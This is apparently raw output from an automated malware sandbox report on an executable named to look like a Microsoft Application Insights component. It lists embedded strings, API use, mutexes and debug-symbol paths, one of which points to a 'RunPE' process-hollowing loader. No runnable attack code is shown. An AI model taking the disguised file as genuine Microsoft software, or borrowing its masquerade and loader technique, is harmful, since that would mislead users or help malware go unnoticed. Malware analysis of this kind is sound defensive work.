Source: sqlite3.dll.2.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.2.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: sqlite3.dll.2.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.2.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.2.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp

Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: certificate valid

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source:	Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source:	Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
